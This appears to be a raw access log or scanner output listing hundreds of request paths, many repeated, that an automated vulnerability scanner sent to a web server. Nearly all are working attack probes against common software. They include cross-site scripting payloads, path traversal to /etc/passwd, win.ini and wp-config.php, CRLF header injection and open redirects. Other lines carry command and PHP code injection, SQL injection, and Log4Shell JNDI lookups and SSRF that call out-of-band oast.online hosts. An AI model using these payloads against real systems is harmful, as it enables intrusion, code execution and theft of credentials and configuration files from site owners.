/web/?api=%27%3E%22%3Csvg%2Fonload=confirm%28%27api%27%29%3E&api_key=%27%3E%22%3Csvg%2Fonload=confirm%28%27api_key%27%29%3E&begindate=%27%3E%22%3Csvg%2Fonload=confirm%28%27begindate%27%29%3E&callback=%27%3E%22%3Csvg%2Fonload=confirm%28%27callback%27%29%3E&categoryid=%27%3E%22%3Csvg%2Fonload=confirm%28%27categoryid%27%29%3E&csrf_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27csrf_token%27%29%3E&email=%27%3E%22%3Csvg%2Fonload=confirm%28%27email%27%29%3E&emailto=%27%3E%22%3Csvg%2Fonload=confirm%28%27emailto%27%29%3E&enddate=%27%3E%22%3Csvg%2Fonload=confirm%28%27enddate%27%29%3E&immagine=%27%3E%22%3Csvg%2Fonload=confirm%28%27immagine%27%29%3E&item=%27%3E%22%3Csvg%2Fonload=confirm%28%27item%27%29%3E&jsonp=%27%3E%22%3Csvg%2Fonload=confirm%28%27jsonp%27%29%3E&l=%27%3E%22%3Csvg%2Fonload=confirm%28%27l%27%29%3E&lang=%27%3E%22%3Csvg%2Fonload=confirm%28%27lang%27%29%3E&list_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27list_type%27%29%3E
/web/?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini
/web/.well-known/acme-challenge/%3C%3fxml%20version=%221.0%22%3f%3E%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%3Ealert%28document.domain%26%23x29%3B%3C/x:script%3E
/web/sys/ui/extend/varkind/custom.jsp
/web/?wp_nlm=confirmation&appurl=aHR0cHM6Ly9leGFtcGxlLmNvbQ==
/web/?month=%27%3E%22%3Csvg%2Fonload=confirm%28%27month%27%29%3E&page_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27page_id%27%29%3E&password=%27%3E%22%3Csvg%2Fonload=confirm%28%27password%27%29%3E&terms=%27%3E%22%3Csvg%2Fonload=confirm%28%27terms%27%29%3E&token=%27%3E%22%3Csvg%2Fonload=confirm%28%27token%27%29%3E&type=%27%3E%22%3Csvg%2Fonload=confirm%28%27type%27%29%3E&unsubscribe_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27unsubscribe_token%27%29%3E&year=%27%3E%22%3Csvg%2Fonload=confirm%28%27year%27%29%3E
/web/download.php?file=../../../../../etc/passwd
/web/http/index.php
/web/index.php?s=/home/page/uploadImg
/web/http/index.php
/web/dashboard/proc.php?type=login
/web/lan.html
/web/wp-content/uploads/data.txt
/web/index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1
/web/asynchPeople/
/web/?url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini
/web/
/web/_users/_all_docs
/web/imc/javax.faces.resource/dynamiccontent.properties.xhtml
/web/file=C:%5CWindows%5Cwin.ini
/web/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://example.com
/web/wp-content/themes/oxygen-theme/download.php?file=../../../wp-config.php
/web/secure/popups/UserPickerBrowser.jspa
/web/wp-content/themes/prostore/go.php?https://example.com/
/web/sys/ui/extend/varkind/custom.jsp
/web/%0a/example.com/
/web/wp-content/plugins/updraftplus/includes/
/web/wp-content/uploads/wpdm-cache/
/web/wp-content/plugins/sfwd-lms/
/web/rest/config/1.0/directory
/web/index.php?page=../../../../../../../../../../etc/passwd
/web/tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E
/web/msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../../../../../../etc/passwd
/web/%0d/example.com/
/web/imc/javax.faces.resource/dynamiccontent.properties.xhtml
/web/wp-config.php
/web/main/blank?message_success=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E
/web/OA_HTML/bispgraph.jsp%0D%0A.js?ifn=passwd&ifl=/etc/
/web/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E
/web/.wp-config.php.swp
/web/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd
/web/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1
/web/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com
/web/?s=index/index/index
/web/msa/../../../../../../../../etc/passwd
/web/OA_HTML/jsp/bsc/bscpgraph.jsp?ifl=/etc/&ifn=passwd
/web/wp-content/plugins/elementor/
/web/lucees3ezf%3cimg%20src%3da%20onerror%3dalert('25SnmLk9MNa72UAISlihXxDaZJE')%3elujb7/admin/imgProcess.cfm
/web/actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/random:915!/logback.xml
/web/MicroStrategy/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com
/web/search
/web/wp-config-sample.php
/web/css_parser.php?css=css_parser.php
/web/js/../../../../../../../../etc/passwd%00.jpg
/web/lucee/lucees3ezf%3cimg%20src%3da%20onerror%3dalert('25SnmLk9MNa72UAISlihXxDaZJE')%3elujb7/admin/imgProcess.cfm
/web/directdata/direct/router
/web/page/exportImport/uploadOperation.jsp
/web/wp-config.inc
/web//netcore_get.cgi
/web/wp-content/plugins/gtranslate/
/web/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
/web///////../../../etc/passwd
/web/Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini
/web/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php
/web/Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=aaa
/web/http/index.php
/web/_users/_all_docs
/web/file=C:%5CWindows%5Cwin.ini
/web/wp-content/uploads/wpdm-cache/
/web/wp-content/themes/prostore/go.php?https://example.com/
/web/secure/popups/UserPickerBrowser.jspa
/web/wp-content/plugins/sfwd-lms/
/web/%0d/example.com/
/web/OA_HTML/jsp/bsc/bscpgraph.jsp?ifl=/etc/&ifn=passwd
/web/systemController/showOrDownByurl.do?down=&dbPath=../Windows/win.ini
/web/wp-content/plugins/boldgrid-backup/cron/restore-info.json
/web/rest/config/1.0/directory
/web/msa/../../../../../../../../etc/passwd
/web/%0D%0ASet-Cookie:crlfinjection=crlfinjection
/web/e/ViewImg/index.html?url=javascript:alert(document.domain)
/web/directdata/direct/router
/web/js/../../../../../../../../etc/passwd%00.jpg
/web/v1/query
/web/poc.txt
/web/sys/ui/extend/varkind/custom.jsp
/web/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1
/web/search
/web/%00/example.com/
/web/page/exportImport/uploadOperation.jsp
/web/eam/vib?id=C:\ProgramData\VMware\VMware+VirtualCenter\vcdb.properties
/web///////../../../etc/passwd
/web
/web/Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=aaa
/web/seeyon/thirdpartyController.do.css/..;/ajax.do
/web/mifs/j_spring_security_check
/web/wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php%00
/web/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php
/web/admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd
/web/main/blank?message_success=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E
/web/MicroStrategy/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com
/web/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik
/web/
/web/wp-config.inc
/web/webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../etc/passwd
/web/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd
/web/page/exportImport/fileTransfer/poc.jsp
/web/cgi-bin/jarrewrite.sh
/web/static///////../../../../etc/passwd
/web/main/blank?message_error=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E
/web/poc.txt
/web/email/unsubscribed?email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(xss)%3E
/web/manager/radius/server_ping.php?ip=127.0.0.1|cat%20/etc/passwd>../../poc.txt&id=1
/web/wp-content/plugins/123contactform-for-wordpress/
/web/rest/api/2/project?maxResults=100
/web/api/ping?count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp
/web/wp-config.old
/web/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00
/web/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php
/web///../app.js
/web/loyalty_enu/start.swe/%3E%22%3E%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/web/ccm/system/panels/page/preview_as_user/preview?cID="></iframe><svg/onload=alert("25SnmL4gMrJaXMbXMymwGI3wvBU")>
/web/index.php?s=captcha
/web/monitoring?part=graph&graph=usedMemory%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/web/plus/carbuyaction.php?dopost=return&code=../../
/web/wp-content/plugins/boldgrid-backup/cron/restore-info.json
/web/webmail/basic/
/web/%0D%0ASet-Cookie:crlfinjection=crlfinjection
/web/e/ViewImg/index.html?url=javascript:alert(document.domain)
/web/v1/query
/web/poc.txt
/web/status%3E%3Cscript%3Ealert(31337)%3C%2Fscript%3E
/web/api/system/deviceinfo
/web/?{alert(1)}
/web/%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=crlfinjection
/web/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/web/%00/example.com/
/web/eam/vib?id=C:\ProgramData\VMware\VMware+VirtualCenter\vcdb.properties
/web/eam/vib?id=C:\Documents+and+Settings\All+Users\Application+Data\VMware\VMware+VirtualCenter\vcdb.properties
/web
/web/seeyon/thirdpartyController.do.css/..;/ajax.do
/web/xml/User/User.xml
/web/%09/example.com/
/web/mifs/j_spring_security_check
/web/MUP/
/web/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
/web/NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml
/web/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik
/web/page/exportImport/fileTransfer/poc.jsp
/web/webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../etc/passwd
/web/webadmin/authportal/bounce.php?url=https://example.com/
/web/cgi-bin/jarrewrite.sh
/web/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik
/web/webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../c:/windows/win.ini
/web/%5C%5Cexample.com/%252e%252e%252f
/web/?s=ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6
/web/main/blank?message_error=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E
/web/email/unsubscribed?email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(xss)%3E
/web/rest/api/2/project?maxResults=100
/web/wp-content/plugins/123contactform-for-wordpress/
/web/
/web/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00
/web/wp-config.old
/web/api/ping?count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp
/web///../app.js
/web/fileDownload?action=downloadBackupFile
/web/loyalty_enu/start.swe/%3E%22%3E%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/web/%5Cexample.com
/web/monitoring?part=graph&graph=usedMemory%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/web/plus/carbuyaction.php?dopost=return&code=../../
/web/_ignition/scripts/--%3E%3Csvg%20onload=alert%28document.domain%29%3E
/web/kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11
/web/bitrix/rk.php?goto=https://example.com
/web/wp-content/themes/Attitude/go.php?https://example.com/
/web/scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd
/web/../../../../../../../../../etc/passwd
/web/wp-config.txt
/web/ueditor/net/controller.ashx?action=catchimage&encode=utf-8
/web/rest/V1/products
/web/fileDownload?action=downloadBackupFile
/web/solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D.c8acjap9m8v98g1htghgcekcuoyyyyync.oast.online/a%7D
/web/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php
/web/wp-content/uploads/mc4wp-debug.log
/web/?{alert(1)}
/web/bitrix/redirect.php?event1=&event2=&event3=&goto=https://example.com
/web/status%3E%3Cscript%3Ealert(31337)%3C%2Fscript%3E
/web/%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=crlfinjection
/web/api/system/deviceinfo
/web/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/web/%0DSet-Cookie:crlfinjection=crlfinjection
/web/MUP/
/web/index.php
/web/index.php/Home/uploadify/fileList?type=.+&path=../../../
/web/%61%27%22%3e%3c%69%6e%6a%65%63%74%61%62%6c%65%3e
/web/index.php?id=50&file=../../../../../../../../../etc/passwd
/web/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=test")
/web/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
/web/plugin/add
/web/actuator/env
/web/xml/User/User.xml
/web/wp-config.php.txt
/web/wp-content/plugins/wpmudev-updates/keys/
/web/webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../c:/windows/win.ini
/web/thruk/cgi-bin/login.cgi
/web/?s=ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6
/web/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=
/web/webadmin/authportal/bounce.php?url=https://example.com/
/web/wp-content/plugins/wordpress-popup/views/admin/
/web/wp-content/plugins/email-subscribers
/web/plugin/customMethod
/web/service/error/sfdc_preauth.jsp?session=s&userid=1&server=http://c8acjap9m8v98g1htghgcekcuoeyyyynq.oast.online%23.salesforce.com/
/web/boardDataWW.php
/web/fileDownload?action=downloadBackupFile
/web/%5Cexample.com
/web/webadmin/reporter/view_server_log.php?server=localhost&act=stats&filename=&offset=1&count=1000&sortorder=&log=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&offset=&sortitem=&filter=
/web/resin-doc/viewfile/?file=/WEB-INF/resin-web.xml
/web/overview.asp
/web/solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D.c8acjap9m8v98g1htghgcekcuoyyyyync.oast.online/a%7D
/web/rest/V1/products
/web/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/web/%5cexample.com/%2f%2e%2e
/web/boaform/admin/formTracert
/web/_ignition/scripts/--%3E%3Csvg%20onload=alert%28document.domain%29%3E
/web/fileDownload?action=downloadBackupFile
/web/.antproxy.php
/web/blog/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=
/web/fileDownload?action=downloadBackupFile
/web/rest/V1/store/storeConfigs
/web/bitrix/redirect.php?event1=&event2=&event3=&goto=https://example.com
/web/pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd
/web/api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9
/web/bitrix/redirect.php?event3=352513&goto=https://example.com
/web/%5chttp://192.168.1.104example.com/%2f%2e%2e
/web/%0DSet-Cookie:crlfinjection=crlfinjection
/web/
/web/%0ASet-Cookie:crlfinjection=crlfinjection
/web/index.php
/web/lcms/index.php
/web/%3F%0DSet-Cookie%3Acrlfinjection=crlfinjection
/web/
/web/
/web/index.php/Home/uploadify/fileList?type=.+&path=../../../
/web/%61%27%22%3e%3c%69%6e%6a%65%63%74%61%62%6c%65%3e
/web/index.php?id=50&file=../../../../../../../../../etc/passwd
/HelpTheHelpDesk.jsdbx
/web/client
/web/xmlrpc.php
/web/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=test")
/web/downloadfile.php?file=../../../../../../../../../../etc/passwd
/web/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml
/web/actuator/env
/web/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php
/web/help/index.jsp?view=%3Cscript%3Ealert(document.cookie)%3C/script%3E
/web/interlib/report/ShowImage?localPath=etc/passwd
/web/wp-config.php.txt
/web/thruk/cgi-bin/login.cgi
/web/wp-config.php.bak
/web/emergency.php
/web/user.php?act=login
/web/wp-content/themes/Grimag/go.php?https://example.com
/web/login/forgetpswd.php?loginsys=1&loginname=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/web/wp-content/plugins/wordpress-popup/views/admin/
/web/wp-content/plugins/email-subscribers
/web/wp-content/backup-db/
/web/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ver)
/web/plugins/vkeyboard/vkeyboard.php?passformname=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/web/service/error/sfdc_preauth.jsp?session=s&userid=1&server=http://c8acjap9m8v98g1htghgcekcuoeyyyynq.oast.online%23.salesforce.com/
/web/var/resource_config.json
/web/license.txt
/web/wp-content/plugins/woocommerce/
/web/login.php
/web/webadmin/reporter/view_server_log.php?server=localhost&act=stats&filename=&offset=1&count=1000&sortorder=&log=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&offset=&sortitem=&filter=
/web/resin-doc/viewfile/?file=/WEB-INF/resin-web.xml
/web/dlibrary/null?oldfile=../../../../../../windows/win.ini&library=null
/web/%20../web-inf/web.xml
/web/
/web/.antproxy.php
/web/boaform/admin/formTracert
/web/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/web/blog/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=
/web/pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd
/web/rest/V1/store/storeConfigs
/web/admin/File/DownloadFile?filePath=wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd&delete=0
/web/wp-content/plugins/music-store/ms-core/ms-submit.php
/web/api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9
/web/%5chttp://192.168.1.104example.com/%2f%2e%2e
/web/bitrix/redirect.php?event3=352513&goto=https://example.com
/web/
/web/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/web/wp-content/plugins/mstore-api/
/web/wp-content/plugins/idx-broker-platinum/
/web/rest/V1/store/storeViews
/web/lcms/index.php
/web/../example.com
/web/bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://example.com
/web/wp-content/plugins/super-forms/
/web/webadm/?q=moni_detail.do&action=gragh
/web/
/web/%3F%0DSet-Cookie%3Acrlfinjection=crlfinjection
/web/hoteldruid/inizio.php
/HelpTheHelpDesk.jsdbx
/web/%0ASet-Cookie%3Acrlfinjection/..
/web/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0
/web/downloadfile.php?file=../../../../../../../../../../etc/passwd
/web/wp-admin/admin-ajax.php?action=fetch_posts&stream-id=1&hash=%3Cimg%20src=x%20onerror=alert(document.domain)%3E
/web/inizio.php
/web/(download)/etc/passwd
/web/
/web/?Page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&callback=%0D%0ASet-Cookie:crlfinjection=crlfinjection&checkout_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&content=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continue=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continueTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&counturl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&data=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&document=%0D%0ASet-Cookie:crlfinjection=crlfinjection&domain=%0D%0ASet-Cookie:crlfinjection=crlfinjection&done=%0D%0ASet-Cookie:crlfinjection=crlfinjection&download=%0D%0ASet-Cookie:crlfinjection=crlfinjection&feed=%0D%0ASet-Cookie:crlfinjection=crlfinjection&file=%0D%0ASet-Cookie:crlfinjection=crlfinjection&host=%0D%0ASet-Cookie:crlfinjection=crlfinjection&html=%0D%0ASet-Cookie:crlfinjection=crlfinjection&http=%0D%0ASet-Cookie:crlfinjection=crlfinjection&https=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&imageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&include=%0D%0ASet-Cookie:crlfinjection=crlfinjection&media=%0D%0ASet-Cookie:crlfinjection=crlfinjection&navigation=%0D%0ASet-Cookie:crlfinjection=crlfinjection&next=%0D%0ASet-Cookie:crlfinjection=crlfinjection&open=%0D%0ASet-Cookie:crlfinjection=crlfinjection&out=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&pageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&picture=%0D%0ASet-Cookie:crlfinjection=crlfinjection&port=%0D%0ASet-Cookie:crlfinjection=crlfinjection&proxy=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirectUri&redirectUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&reference=%0D%0ASet-Cookie:crlfinjection=crlfinjection&referrer=%0D%0ASet-Cookie:crlfinjection=crlfinjection&req=%0D%0ASet-Cookie:crlfinjection=crlfinjection&request=%0D%0ASet-Cookie:crlfinjection=crlfinjection&retUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return=%0D%0ASet-Cookie:crlfinjection=crlfinjection&returnTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&rurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&show=%0D%0ASet-Cookie:crlfinjection=crlfinjection&site=%0D%0ASet-Cookie:crlfinjection=crlfinjection&source=%0D%0ASet-Cookie:crlfinjection=crlfinjection&src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&target=%0D%0ASet-Cookie:crlfinjection=crlfinjection&to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&uri=%0D%0ASet-Cookie:crlfinjection=crlfinjection&url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&val=%0D%0ASet-Cookie:crlfinjection=crlfinjection&validate=%0D%0ASet-Cookie:crlfinjection=crlfinjection&view=%0D%0ASet-Cookie:crlfinjection=crlfinjection&window=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection
/web/help/index.jsp?view=%3Cscript%3Ealert(document.cookie)%3C/script%3E
/web/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php
/web/wp-config.php.bak
/web/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml
/web/interlib/report/ShowImage?localPath=etc/passwd
/web/config/postProcessing/testNaming?pattern=%3Csvg/onload=alert(document.domain)%3E
/web/src/read_body.php?mailbox=/etc/passwd&passed_id=1&
/web/?Test=%0D%0ASet-Cookie:crlfinjection=crlfinjection
/web/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ver)
/web/wp-config.php.old
/web/mod/lti/auth.php?redirect_uri=javascript:alert('25SnmIOQ3Zj3EzmxCOldAwTYQAb')
/web/login/forgetpswd.php?loginsys=1&loginname=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/web/plugins/vkeyboard/vkeyboard.php?passformname=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/web/interlib/report/ShowImage?localPath=C:\Windows\system.ini
/web/wp-content/backup-db/
/web/'
/web/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(id)
/web/wp-config.php.dist
/web/wp-content/plugins/arforms/
/web/wp-content/plugins/gtranslate/url_addon/gtranslate.php?glang=en&gurl=/www.pluginvulnerabilities.com
/web/../../../..//etc/passwd
/web/dlibrary/null?oldfile=../../../../../../windows/win.ini&library=null
/web/install/install.php?step=4
/web/login.php
/web/index.php?g=g&m=Door&a=index&content=<?php%20phpinfo();
/web/adjuncts/3a890183/
/web/rest/sharelinks/1.0/link?url=https://c8acjap9m8v98g1htghgcekcutyyyyyn6.oast.online/
/web/wp-content/plugins/easy-wp-smtp/
/web/admin/File/DownloadFile?filePath=wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd&delete=0
/web/exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
/web/wp-content/plugins/mstore-api/
/web/wp-content/plugins/idx-broker-platinum/
/web/bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://example.com
/web/wp-content/plugins/music-store/ms-core/ms-submit.php
/web/rest/V1/store/storeViews
/web/../example.com
/web/wp-admin/admin-ajax.php?action=fetch_posts&stream-id=1&hash=%3Cimg%20src=x%20onerror=alert(document.domain)%3E
/web/wp-content/plugins/gtranslate/url_addon/gtranslate.php?glang=en&gurl=/www.pluginvulnerabilities.com
/web/wp-content/plugins/easy-wp-smtp/
/web/'
/web/install/includes/configure.php
/web/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php
/web/inizio.php
/web/config/postProcessing/testNaming?pattern=%3Csvg/onload=alert(document.domain)%3E
/web/wp-content/plugins/arforms/
/web/
/web/rest/sharelinks/1.0/link?url=https://c8acjap9m8v98g1htghgcekcutyyyyyn6.oast.online/
/web/webadm/?q=moni_detail.do&action=gragh
/web/(download)/etc/passwd
/web/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(id)
/web/index.php?g=g&m=Door&a=index&content=<?php%20phpinfo();
/web/../../../..//etc/passwd
/web/wp-admin/setup-config.php?step=1
/web/api/v1/method.callAnon/cve_exploit
/web/wp-content/uploads/tmm_db_migrate/tmm_db_migrate.zip
/web/wp-content/plugins/simple-file-list/ee-upload-engine.php
/web/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0
/web/src/read_body.php?mailbox=/etc/passwd&passed_id=1&
/web/adjuncts/3a890183/
/web/wp-config.php.dist
/web/.example.com
/web/plus/download.php?open=1&link=aHR0cHM6Ly9ldmlsLmNvbQo=
/web
/web/bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://example.com
/web/wp-content/plugins/wp-mail-smtp/
/web/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&mimetype=text/html
/web/wp-admin/admin-ajax.php?action=action_name
/web/index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1
/web/src/download.php?absolute_dl=true&passed_id=1&passed_ent_id=1&mailbox=/etc/passwd
/web/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(/XSS-form/)%3E&control=upload
/web/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php
/web/
/web/wp-content/plugins/wp-mail-smtp-pro/
/web/ws/v1/cluster/apps/new-application
/web/api/user/reg
/web/installer-log.txt
